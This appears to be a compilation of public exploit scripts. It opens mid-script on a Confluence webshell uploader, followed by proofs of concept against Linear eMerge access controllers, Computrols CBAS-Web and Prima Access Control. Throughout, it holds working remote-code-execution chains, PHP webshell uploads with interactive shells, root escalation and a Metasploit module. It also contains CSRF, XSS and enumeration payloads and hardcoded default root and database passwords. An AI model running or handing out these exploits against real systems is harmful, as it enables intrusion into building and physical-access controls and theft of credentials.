-1: print 'Authentication failed' return 0 elif r.text.find('Unauthorized') != -1: print 'Unauthorized' return 0 else: print 'Authentication successful' soup = BeautifulSoup(r.text, 'html.parser') ATLTOKEN = soup.find('meta', {'id': 'atlassian-token'})['content'] print 'Atlassian token %s' % (ATLTOKEN) return 1 def do_upload(_pageid): if OS == 'Windows': upload_form_data = SHELLCODE_WINDOWS upload_req_params = { 'pageId': _pageid, 'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp', 'size': '3474', 'mimeType': 'text/plain', 'spaceKey': 'isis', 'atl_token': ATLTOKEN, 'name': 'assist' } elif OS == 'Linux': upload_form_data = SHELLCODE_LINUX upload_req_params = { 'pageId': _pageid, 'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp', 'size': '3516', 'mimeType': 'text/plain', 'spaceKey': 'isis', 'atl_token': ATLTOKEN, 'name': 'assist' } print 'Uploading webshell' r = session.post(UPLOADURL, params=upload_req_params, data=base64.decodestring(upload_form_data), allow_redirects=True, verify=False)#, proxies=proxies) if r.status_code == 200 and r.text.find('actionErrors') == -1: print 'Webshell uploaded' return 1 else: print 'Error while uploading webshell' return 0 def do_downloadall(_pageid): downloadall_req_params = { 'pageId': _pageid } print 'Moving webshell to the root directory of the web server' r = session.get(DOWNLOADALLURL, params=downloadall_req_params, allow_redirects=True, verify=False)#, proxies=proxies) r = session.get(WEBSHELLURL, allow_redirects=True, verify=False)#, proxies=proxies) if r.status_code == 200: print 'Webshell found' print 'Visit %s' % WEBSHELLURL return 1 else: print 'Webshell not found' return 0 def do_getspaces(): print 'Getting spaces' r = session.get(VIEWSPACESURL, allow_redirects=True, verify=False)#, proxies=proxies) spacelist = re.findall(r'\"key\":\"(\w+)\"', r.text) return spacelist def do_createspace(): print 'Creating space' upload_form_data = json.dumps({ "key": "TST1", "name": "Example space", "description": { "plain": { "value": "This is an example space", "representation": "plain" } }, "metadata": {} }) headers = { 'Content-Type': 'application/json' } r = session.post(VIEWSPACESURL, data=upload_form_data, headers=headers, allow_redirects=True, verify=False)#, proxies=proxies) matched = re.match(".*\"key\":\"(\w+)\".*", r.text) if matched: print 'Space created' return matched.group(1) else: print 'Space not created' return 0 def do_createpage(space): global PAGEID print 'Trying %s space' % (space) r = session.get(CREATEPAGEURL+space, allow_redirects=True, verify=False)#, proxies=proxies) if r.status_code == 200 and r.text.find('ajs-draft-id') != -1: soup = BeautifulSoup(r.text, 'html.parser') pageid = soup.find('meta', {'name': 'ajs-draft-id'})['content'] pageid_pattern = re.compile("^(\d+)$") if pageid_pattern.match(pageid): PAGEID = pageid print 'Page ID created %s' % (pageid) return 1 else: print 'Unexpected Page ID format' return 0 else: print 'Page ID not created' return 0 def main(): if do_authenticate() != 1: exit() if PAGEID != '': if PAGEID == '0': spaces = do_getspaces() for sp in spaces: if do_createpage(sp) == 1: if do_upload(PAGEID) != 1: continue if do_downloadall(PAGEID) != 1: continue else: exit() new_sp = do_createspace() if new_sp != 0: if do_createpage(new_sp) == 1: if do_upload(PAGEID) != 1: exit() if do_downloadall(PAGEID) != 1: exit() exit() else: exit() else: exit() if do_upload(PAGEID) != 1: exit() if do_downloadall(PAGEID) != 1: exit() else: ID = PAGEID_RANGE_START while ID <= PAGEID_RANGE_END: print 'Trying Page Id %d' % (ID) if do_upload(ID) == 1: if do_downloadall(ID) == 1: break ID += 1 if __name__ == "__main__": main()

# Exploit Title: eMerge E3 1.00-06 - Arbitrary File Upload # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7257 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC ##################################################################### # # lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2 # Starting exploit at 17.01.2019 13:04:17 # # [email protected]:/spider/web/webroot/badging/bg$ id # uid=1003(lighttpd) gid=0(root) # # [email protected]:/spider/web/webroot/badging/bg$ echo davestyle | su -c id # Password: # uid=0(root) gid=0(root) groups=0(root) # # [email protected]:/spider/web/webroot/badging/bg$ exit # # [+] Deleting webshell.php file... # [+] Done! # ##################################################################### import datetime import requests import sys##### import os###### piton = os.path.basename(sys.argv[0]) badge = "/badging/badge_layout_new_v0.php" shell = "/badging/bg/webshell.php" if len(sys.argv) < 2: print "\n\x20\x20[*] Usage: "+piton+" <ipaddress:port>\n" sys.exit() ipaddr = sys.argv[1] vremetodeneska = datetime.datetime.now() print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S") print while True: try: target = "http://"+ipaddr+badge headers = {"User-Agent": "Brozilla/16.0", "Accept": "anything", "Accept-Language": "mk-MK,mk;q=0.7", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=----j", "Connection": "close"} payload = ("------j\r\nContent-Disposition: form-da" "ta; name=\"layout_name\"\r\n\r\nwebshel" "l.php\r\n------j\r\nContent-Disposition" ": form-data; name=\"bg\"; filename=\"we" "bshell.php\"\r\nContent-Type: applicati" "on/octet-stream\r\n\r\n<?\nif($_GET['cm" "d']) {\n system($_GET['cmd']);\n }\n?" ">\n\r\n------j--\r\n") requests.post(target, headers=headers, data=payload) cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ") execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd) print execute.text if cmd.strip() == "exit": print "[+] Deleting webshell.php file..." requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php") print "[+] Done!\n" break else: continue except Exception: print "Error!" break sys.exit()

# Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7255 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC: GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

# Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 4.6.07 # Tested on: NA # CVE : CVE-2019-7269 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC: #!/bin/bash # # Full remote code execution exploit for the Linear eMerge50P/5000P 4.6.07 # Including escalating to root privileges # CVE: CVE-2019-7266, CVE-2019-7267, CVE-2019-7268, CVE-2019-7269 # Advisory: https://applied-risk.com/resources/ar-2019-006 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # # This script is tested on macOS 10.13.6 # by Sipke Mellema # # usage: ./sploit.sh http://target # ########################################################################## # # $ ./sploit.sh http://192.168.1.1 # # # . . . . . # . . . . . # | |Linear eMerge50 4.6.07| | # | | | | # | |Remote code executionz| | # | | With priv escalation | | # | | Get yours today | | # | | | | | # | | Boomch | | # . . . . . # . . . . . # # # # [*] Checking connection to the target.. # [V] We can connect to the server # [*] Checking if already infected.. # [V] Target not yet infected.. # [*] Creating custom session file.. # [*] Uploading custom session file.. # [V] Session file active! # [*] Retrieving CSRF token.. # [V] CSRF_TOKEN: AI1R5ebMTZXL8Vu6RyhcTuavuaEbZvy9 # [*] Uploading file.. # [V] File successfully uploaded # [*] Writing new config.. # [V] Wrote new config, restarting device # [*] Looks good! Waiting for device to reboot.. # [V] Executing: whoami.. # [V] Username found: root # [*] Cleaning up uploaded files.. # [*] Removing fake backup file.. # [*] Removing shell script.. # [*] Files removed # # [*] If that worked, you can how execute commands via your cookie # [*] The URL is: http://192.168.1.1/cgi-bin/websrunnings.cgi # [*] Or type commands below ('quit' to quit) # # root@http://192.168.1.1$ id # uid=0(root) gid=0(root) groups=0(root) # root@http://192.168.1.1$ quit # ########################################################################## RED='\033[0;31m'; BLUE='\033[0;34m'; GREEN='\033[0;32m'; NC='\033[0m' BANNER=" \t . . . . . \t . . . . . \t| |${BLUE}Linear eMerge50 4.6.07${RED}| | \t| |${BLUE} ${RED}| | \t| |${BLUE}Remote code executionz${RED}| | \t| |${BLUE} With priv escalation ${RED}| | \t| |${BLUE} Get yours today ${RED}| | \t| |${BLUE} | ${RED}| | \t| |${BLUE} Boomch ${RED}| | \t . . . . . \t . . . . . ${NC} " printf "\n${RED}${BANNER}\n\n" function echo_green { printf "${GREEN}[*] $@${NC}\n" } function echo_blue { printf "${BLUE}[V] $@${NC}\n" } function echo_red { printf "${RED}[-] $@${NC}\n" } function show_usage { echo -en "Usage: ./sploit.sh " } # check arguments if [ $# -eq 0 ] then echo_red "Incorrect parameters" show_usage exit fi # Define global paramters VULN_HOST=$1 TEST_CMD="whoami" # ========================= Vuln 2: Session ID allows path traversal # Path traversal to session file injected as backup file SESSION_ID="../web/upload/system/backup.upg" function run_remote_shell { # shell is in the context of the lower privileged user called s2user # but the user has sudo rights # ========================= Vuln 5: Webserver runs as root TEST_CMD='' while read -p "${SPLOT_USERNAME}@${VULN_HOST}$ " TEST_CMD && [ "${TEST_CMD}" != "quit" ] ; do curl -s -k -H "Cookie: sudo $TEST_CMD" ${VULN_HOST}/cgi-bin/websrunnings.cgi echo "" done } # ========================= Pre-exploit checks # check connection echo_green "Checking connection to the target.." RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST} -o /dev/null --connect-timeout 3 --max-time 5` if [ "$RESULT" != "200" ] ; then echo_red "Could not connect to ${VULN_HOST} :(" ; exit fi echo_blue "We can connect to the server" # check already infected echo_green "Checking if already infected.." RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST}/cgi-bin/websrunnings.cgi -o /dev/null --connect-timeout 3 --max-time 5` if [ "$RESULT" == "200" ] ; then echo_blue "Target already seems to be infected" SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_blue "Username found: ${SPLOT_USERNAME}" read -p "Try shell directly? (Y/N)" TEST if [ "$TEST" == "Y" ] ; then echo_green "Trying direct shell.." run_remote_shell exit fi else echo_blue "Target not yet infected.." ; fi # ========================= Vuln 1: Sys update CGI script allows unauthenticated upg-file upload # Used to create file with the contents of a valid session file # Session file required a timestamp from < 3600 seconds ago # And a valid (remote) IP address echo_green "Creating custom session file.." # binary session file SESS_FILE_BIN_PRE="MzEzMzc4MDA4NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTeXN0ZW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFkbWluaXN0cmF0b3IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWRtaW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" SESS_FILE_BIN_POST="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQUkxUjVlYk1UWlhMOFZ1NlJ5aGNUdWF2dWFFYlp2eTkAAAAAYtPxW0o/71s=" # write session/backup file printf $SESS_FILE_BIN_PRE | base64 -D > backup.upg # write IP MY_IP=`curl -s https://api.ipify.org` printf ${MY_IP} >> backup.upg printf $SESS_FILE_BIN_POST | base64 -D >> backup.upg # replace timestamp python -c "import struct,time,sys; sys.stdout.write(struct.pack('<i',int(time.time()+(3600*5))))" | dd of=backup.upg bs=1 seek=1080 count=4 conv=notrunc 2> /dev/null # upload session as backup file echo_green "Uploading custom session file.." curl -s -F [email protected] ${VULN_HOST}/cgi-bin/uplsysupdate.cgi # check if session file works RESULT=`curl -s -w "%{http_code}\\n" --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/foo -o /dev/null --connect-timeout 3 --max-time 5` if [ "$RESULT" != "200" ] ; then echo_red "Creating session file didn't seem to work :(" ; exit fi echo_blue "Session file active!" # ========================= Vuln 3: Image upload allows any file contents # We use it to upload a shell script # It will be run as root on startup # get csrf token echo_green "Retrieving CSRF token.." CSRF_TOKEN=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/frameset/ | grep -E -o 'csrft = "(.*)"' | awk -F '"' '{print $2}'` echo_blue "CSRF_TOKEN: $CSRF_TOKEN" if [ -z "$CSRF_TOKEN" ]; then echo_red "Could not get CSRF token :(" exit fi # prepare file # this will run as root echo "cp /usr/local/s2/web/cgi-bin/websrunning.cgi /usr/local/s2/web/cgi-bin/websrunnings.cgi" > shell.jpg echo 'sed -i '"'"'s/echo "OK"/A=\`\$HTTP_COOKIE\`;printf "\$A"/'"'"' /usr/local/s2/web/cgi-bin/websrunnings.cgi' >> shell.jpg # upload file echo_green "Uploading file.." RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" \ -F "csrft=$CSRF_TOKEN" \ -F "person=31337" \ -F "[email protected]" \ ${VULN_HOST}/person/upload/ | grep -o "File successfully uploaded"` echo_blue $RESULT if [[ ! "$RESULT" =~ "successfully" ]]; then echo_red "Could not upload file :(" exit fi # ========================= Vuln 4: Config allows command injection # Length is limited # Also, no spaces allowed # change config # the file in the config file will be run as root at startup echo_green "Writing new config.." curl -s ${VULN_HOST}/goform/saveS2ConfVals --cookie ".sessionId=$SESSION_ID" --data "timeserver1=a.a%24%28bash%3C%2Fusr%2Flocal%2Fs2%2Fweb%2Fupload%2Fpics%2Fshell.jpg%29&timeserver2=&timeserver3=&timezone=America%2FChicago&save=Save&urlOk=cfgntp.asp&urlError=cfgntp.asp&okpage=cfgntp.asp" > /dev/null echo_blue "Wrote new config, restarting device" # restart device RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/restarts2Conf --data "changeNetwork=1" | grep -o "The proxy server could not handle the request"` # this is supposed to get returned (device rebooting) if [[ "$RESULT" =~ "could not handle the request" ]]; then echo_green "Looks good! Waiting for device to reboot.." sleep 20 echo_blue "Executing: whoami.." SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_blue "Username found: ${SPLOT_USERNAME}" # cleanup echo_green "Cleaning up uploaded files.." echo_green "Removing fake backup file.." RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/system/backup.upg" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_green "Removing shell script.." RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/pics/shell.jpg" ${VULN_HOST}/cgi-bin/websrunnings.cgi` echo_green "Files removed" # start shell echo "" echo_green "If that worked, you can now execute commands via your cookie" echo_green "The URL is: ${VULN_HOST}/cgi-bin/websrunnings.cgi" echo_green "Or type commands below ('quit' to quit)" echo "" run_remote_shell else echo_red "Exploit failed :(" fi exit

# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 4.6.07 # Tested on: NA # CVE : CVE-2019-7265 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 #!/usr/bin/env python # # ==== # python lineare3_sshroot.py 192.168.1.2 # [+] Connecting to 192.168.1.2 on port 22: Done # [!] Only Linux is supported for ASLR checks. # [*] [email protected]: # Distro Unknown Unknown # OS: Unknown # Arch: Unknown # Version: 0.0.0 # ASLR: Disabled # Note: Susceptible to ASLR ulimit trick (CVE-2016-3672) # [+] Opening new channel: 'shell': Done # [*] Switching to interactive mode # Last login: Fri Nov 1 04:21:44 2019 from 192.168.2.17 # root@imx6slevk:~# id # uid=0(root) gid=0(root) groups=0(root) # root@imx6slevk:~# pwd # /home/root # root@imx6slevk:~# exit # logout # [*] Got EOF while reading in interactive # [*] Closed SSH channel with 192.168.1.2 # ==== from pwn import * if len(sys.argv) < 2: print 'Usage: ./e3.py <ip>\n' sys.exit() ip = sys.argv[1] rshell = ssh('root', ip, password='davestyle', port=22) rshell.interactive()

# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit) # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 4.6.07 # Tested on: NA # CVE : CVE-2019-7265 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23 # ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Linear eMerge E3 Access Controller Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in the Linear eMerge E3 Access Controller. The issue is triggered by an unsanitized exec() PHP function allowing arbitrary command execution with root privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gjoko Krstic <[email protected]> ' # Discovery, Exploit, MSF Module ], 'References' => [ [ 'URL', 'https://applied-risk.com/labs/advisories' ], [ 'URL', 'https://www.nortekcontrol.com' ], [ 'CVE', '2019-7256'] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [ ['Linear eMerge E3', { }], ], 'DisclosureDate' => "Oct 29 2019", 'DefaultTarget' => 0 ) ) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"), 'vars_get' => { 'No' => '251', 'door' => '1337' } }) if res.code == 200 and res.to_s =~ /PHP\/5.6.23/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'vars_get' => { 'No' => '251', 'door' => "`"+cmd+"`" } }) unless res fail_with(Failure::Unknown, 'Exploit failed!') end res end def exploit http_send_command(payload.encoded) print_status("Sending #{payload.encoded.length} byte payload...") end end

# Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : N/A # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system #!/usr/bin/env python ''' Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit Affected versions: 19.0.0 and below by Sipke Mellema, 2019 Uses two vulnerabilities for executing commands: - An authorization bypass in the auth module (CVE-2019-10853) - A code execution vulnerability in the json.php endpoint (CVE-2019-10854) Example usage: $ python CBASWeb_19_rce.py 192.168.1.250 "cat /var/www/cbas-19.0.0/includes/db.php" ------------==[CBAS Web v19 Remote Command Injection [*] URL: http://192.168.1.250/ [*] Executing: cat /var/www/cbas-19.0.0/includes/db.php [*] Cookie is authenticated [*] Creating Python payload.. [*] Sending Python payload.. [*] Server says: <?php // Base functions for database access // Expects a number of constants to be set. Set settings.php // Only allow local access to the database for security purposes if(defined('WINDOWS') && WINDOWS){ define('MYSQL_HOST', '192.168.1.2'); define('DB_USER', 'wauser'); define('DB_PASS', 'wapwstandard'); /*define('DB_USER', 'root'); define('DB_PASS', 'souper secrit');*/ ... ''' import requests import sys import base64 as b import json def debug_print(msg, level=0): if level == 0: print "[*] %s" % msg if level == 1: print "[-] %s" % msg # Check parameters if len(sys.argv) < 3: print "Missing target parameter\n\n\tUsage: %s <IP or hostname> \"<cmd>\"" % __file__ exit(0) print "------------==[CBAS Web v18 Remote Command Injection\n" # Set host, cookie and URL host = sys.argv[1] cookies = {'PHPSESSID': 'comparemetoasummersday'} url = "http://%s/" % host debug_print("URL: %s" % url) # Command to execute # Only use single quotes in cmd pls icmd = sys.argv[2] if '"' in icmd: debug_print("Please don't use double quotes in your command string", level = 1) exit(0) debug_print("Executing: %s" % icmd) # URL for performing auth bypass by setting the auth cookie flag to true auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test" # URL for removing auth flag from cookie (for clean-up) logout_sess_req = "cbas/index.php?m=auth&a=logout" # URL for command injection and session validity checking json_checks_req = "cbas/json.php" # Perform logout def do_logout(): requests.get(url + logout_sess_req, cookies = cookies) # Check if out cookie has the authentication flag def has_auth(): ret = requests.get(url + json_checks_req, cookies = cookies) if ret.text == "Access Forbidden": return False return True # Set auth flag on cookie def set_auth(): requests.get(url + auth_bypass_req, cookies = cookies) # ======================================================= # Perform auth bypass if not authenticated yet if not has_auth(): debug_print("Cookie not yet authenticated") debug_print("Setting auth flag on cookie via auth bypass..") set_auth() # Check if bypass failed if not has_auth(): debug_print("Was not able to perform authorization bypass :(") debug_print("Exploit failed, quitting..", level = 1) exit(0) else: debug_print("Cookie is authenticated") debug_print("Creating Python payload..") # Payload has to be encoded because the server uses the following filtering in exectools.php: # $bad = array("..", "\\", "&", "|", ";", '/', '>', '<'); # So no slashes, etc. This means only two "'layers' of quotes" # Create python code exec code cmd_python = 'import os; os.system("%s")' % icmd # Convert to Python array cmd_array_string = str([ord(x) for x in cmd_python]) # Create command injection string p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\"" % cmd_array_string # Base64 encode for p parameter p_encoded = b.b64encode(p_unencoded) # Execute command debug_print("Sending Python payload..") ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded}) # Parse result ret_parsed = json.loads(ret.text) try: metadata = ret_parsed["metadata"] identifier = metadata["identifier"] debug_print("Server says:") print identifier # JSON Parsing error except: debug_print("Error parsing result from server :(", level = 1) # Uncomment if you want the cookie to be removed after use # debug_print("Logging out") # do_logout()

# Exploit Title: CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10847 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system <!-- CSRF Add Super Admin --> <html> <body> <script>history.pushState('', 't00t', 'index.php')</script> <form action="http://192.168.1.250/cbas/index.php?m=users&a=user_add_p" method="POST"> <input type="hidden" name="username_" value="Sooper" /> <input type="hidden" name="first" value="Mess" /> <input type="hidden" name="last" value="O'Bradovich" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="password_" value="" /> <input type="hidden" name="notes" value="CSRFed" /> <input type="hidden" name="group_id" value="0" /> <input type="hidden" name="role" value="super" /> <input type="hidden" name="md5password" value="179edfe73d9c016b51e9dc77ae0eebb1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10849 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system $ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz $ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password" #for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do # mysql -u root --password="souper secrit" -e "describe $i" wadb; mysql -u root --password="souper secrit" $DB < $filename.sql $MYSQL -u root --password="souper secrit" -e "$SQL"

# Exploit Title: CBAS-Web 19.0.0 - Username Enumeration # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10848 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Testing for non-valid user: POST /cbas/index.php?m=auth&a=login HTTP/1.1 username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62 # Response for non-valid user: <!-- Failed login comments appear here --> <p class="alert-error">randomuser</p> ======================================================================== Testing for valid user: POST /cbas/index.php?m=auth&a=login HTTP/1.1 username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s # Response for valid user: <!-- Failed login comments appear here --> <p class="alert-error">Invalid username/password combination. Please try again!</p>

# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.3.35 # Tested on: NA # CVE : CVE-2019-7671 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Prima Access Control 2.3.35 Authenticated Stored XSS # PoC POST /bin/sysfcgi.fx HTTP/1.1 Host: 192.168.13.37 Connection: keep-alive Content-Length: 265 Origin: https://192.168.13.37 Session-ID: 10127047 User-Agent: Mozi-Mozi/44.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/html, */*; q=0.01 Session-Pc: 2 X-Requested-With: XMLHttpRequest Referer: https://192.168.13.37/app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 <requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>